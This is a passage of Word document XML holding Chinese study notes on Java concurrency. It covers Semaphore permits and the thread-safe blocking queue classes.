          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>当前在多线程环境下被扩放使用，操作系统的信号量是个很重要的概念，在进程控制方面都有应用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>并发库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Semaphore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>可以很轻松完成信号量控制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>可以控制某个资源可被同时访问的个数，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>获取一个许可，如果没有就等待，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>释放一个许可。比如在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>下可以设置共享文件的最大客户端访问个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="007F2E6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="244" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现的功能就类似厕所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个坑，假如有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个人要上厕所，那么同时只能有多少个人去上厕所呢？同时只能有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个人能够占用，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个人中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的任何一个人让开后，其中等待的另外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个人中又有一个人可以占用了。另外等待的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个人中可以是随机获得优先机会，也可以是按照先来后到的顺序获得机会，这取决于构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象时传入的参数选项。单个信号量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象可以实现互斥锁的功能，并且可以是由一个线程获得了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，再由另一个线程释放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，这可应用于死锁恢复的一些场合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E6D" w:rsidRPr="007F2E6D" w:rsidRDefault="007F2E6D" w:rsidP="00B83533"/>
    <w:p w:rsidR="003F57AA" w:rsidRPr="00F41A4C" w:rsidRDefault="003F57AA" w:rsidP="00FC48A6">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CA108F" w:rsidRPr="00CA108F">
        <w:t>CopyOnWriteArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331D41" w:rsidRPr="00331D41" w:rsidRDefault="00331D41" w:rsidP="00B83533"/>
    <w:p w:rsidR="00E91E5F" w:rsidRPr="00F41A4C" w:rsidRDefault="00E91E5F" w:rsidP="00E91E5F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F501FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidR="00F501FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91E5F" w:rsidRPr="004C243D" w:rsidRDefault="004C243D" w:rsidP="004C243D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻塞队列和非阻塞队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91E5F" w:rsidRPr="00BA382F" w:rsidRDefault="00B004D4" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>线程安全的队列</w:t>
      </w:r>
      <w:r w:rsidR="00FB0C25" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>分为阻塞队列和非阻塞队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B321D6" w:rsidRPr="00BA382F" w:rsidRDefault="00B321D6" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockingQueue </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>阻塞算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B321D6" w:rsidRPr="00BA382F" w:rsidRDefault="00B321D6" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ConcurrentLinkedQueue </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>非阻塞算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E725A7" w:rsidRPr="00BA382F" w:rsidRDefault="00E725A7" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>具体实现类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E725A7" w:rsidRPr="00BA382F" w:rsidRDefault="00BA382F" w:rsidP="00F32669">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="188" w:firstLine="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="000B7BE3" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ArrayBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="000B7BE3" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>其构造函数必须带一个</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>参数来指明其大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E725A7" w:rsidRPr="00BA382F" w:rsidRDefault="00BA382F" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LinkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，若其构造函数带一个规定大小的参数，生产的</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>有大小限制，若不带大小参数，锁生产的</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的大小由</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer.MAX_VALUE</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>来决定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E725A7" w:rsidRDefault="00BA382F" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PriorityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>其所含对象的排序不是</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FIFO</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，而是依据对象的自然顺序或者构造函数的</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidR="00E725A7" w:rsidRPr="00BA382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>决定的顺序。</w:t>
      </w:r>
    </w:p>
